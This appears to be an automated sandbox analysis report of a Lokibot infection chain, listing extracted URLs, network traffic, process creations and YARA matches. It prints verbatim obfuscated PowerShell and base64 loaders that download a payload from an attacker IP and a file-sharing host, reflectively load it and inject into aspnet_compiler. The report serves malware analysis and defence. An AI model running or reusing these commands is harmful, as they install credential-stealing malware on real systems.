Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: powershell.exe, 00000001.00000002.1822805726.000000000595C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/33/seemybes
Source: powershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1833233000.00000000077C6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1833233000.000000000780F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF
Source: powershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF$
Source: powershell.exe, 00000001.00000002.1833233000.000000000780F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF(s
Source: powershell.exe, 00000001.00000002.1821744750.00000000032A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF2
Source: powershell.exe, 00000001.00000002.1833233000.0000000007779000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFhN
Source: powershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFn
Source: powershell.exe, 00000001.00000002.1833233000.0000000007852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFp
Source: powershell.exe, 00000001.00000002.1833233000.0000000007779000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFsLMEM
Source: powershell.exe, 00000003.00000002.1712155166.0000000005397000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000001.00000002.1831158393.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1714213863.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1822805726.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712155166.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2337193230.0000000004A51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000D.00000002.2892615364.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: powershell.exe, 00000007.00000002.2329487892.0000000000887000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail
Source: powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com
Source: powershell.exe, 00000007.00000002.2337193230.0000000004D62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/geLR
Source: powershell.exe, 00000009.00000002.1949160377.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1949062119.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1950549145.0000000002F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT
Source: powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
Source: powershell.exe, 00000009.00000002.1995186710.00000000072B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrnticffhmt
Source: powershell.exe, 00000003.00000002.1715998634.0000000007635000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka..ora
Source: powershell.exe, 00000001.00000002.1822805726.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712155166.0000000004DA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2337193230.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2337193230.0000000004A19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000004AA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1712155166.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000009.00000002.1951506450.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2359283206.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.mic
Source: powershell.exe, 00000001.00000002.1822805726.0000000004F88000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000001.00000002.1833233000.0000000007799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/
Source: powershell.exe, 00000001.00000002.1831158393.0000000005E98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1714213863.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1951506450.0000000005B08000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.4:49731 version: TLS 1.2

System Summary

Detected Cobalt Strike Beacon

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"	Jump to behavior

Malicious sample detected (through community Yara rule)

Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.powershell.exe.6a69e98.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
